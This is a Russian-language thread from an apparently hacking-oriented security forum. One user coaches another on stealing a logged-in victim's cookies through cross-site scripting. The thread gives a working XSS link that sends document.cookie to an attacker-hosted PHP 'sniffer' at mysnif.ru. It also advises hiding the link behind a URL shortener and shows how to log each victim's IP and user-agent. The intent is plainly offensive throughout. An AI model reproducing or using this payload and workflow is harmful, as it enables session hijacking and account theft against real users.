ANTICHAT — форум по информационной безопасности, OSINT и технологиям

А сниффер тут причем? Пользуйся тем чем пользовался.

сохраняешь код выше в файл snif.php и заливаешь на хостинг, вместе с какой-нибудь картинкой с именем pict.jpg. допустим, твой домен mysnif.ru. тогда ссылка твоя будет вида:

******.net/players/?st=">window.location.href='http://mysnif.ru/snif.php?cookies='+document.cookie;

Куки будут записаны в файл cookies.txt. Также неплохо бы еще записывать User-Agent и IP, при необходимости допилишь сам

Cлушай,а жертва должна быть зарегена на сайте в котором xss? .

Я PHP не знаю,но код я составил так .

.SpoilerTarget" type="button">Spoiler: cod

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL,"http://..");

curl_setopt($ch, CURLOPT_HEADER, 0); //

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");

$result = curl_exec ($ch);

curl_close ($ch);

У меня сервер на Hostinger.ru,как сделать так что при открытий сайта переходило на

xss ?

что-то я не пойму, что ты хочешь сделать... жертве тебе нужно подсунуть ссылку, которую я приводил выше (лучше воспользоваться какой-нибудь сокращалкой). когда жертва по ней перейдет, ее будет перенаправлено на твой скрипт (сниффер), предварительно подставив куки в качестве параметров, откуда сниффер их возьмет и запишет в файл. жертва естественно должна быть зарегана на сайте, иначе нету смысла п*здить у нее куки.

Токо ты не ответил.а допилил я правильно по поводу user agent ?

нет. ты подготавливаешь какой-то запрос на курл, а тебе нужно получить юзерагент пользователя, посетившего твой скрипт. храниться он в массиве $_SERVER, там же и айпи клиента:

$_SERVER['HTTP_USER_AGENT']

$_SERVER['REMOTE_ADDR']

и куки $_SERVER[' HTTP_COOKIE']

а куки то ему зачем?) если он их не выставит, то значение все равно будет пустым)) куки от сайта донора передаются в гет параметрах

я про пхпинжект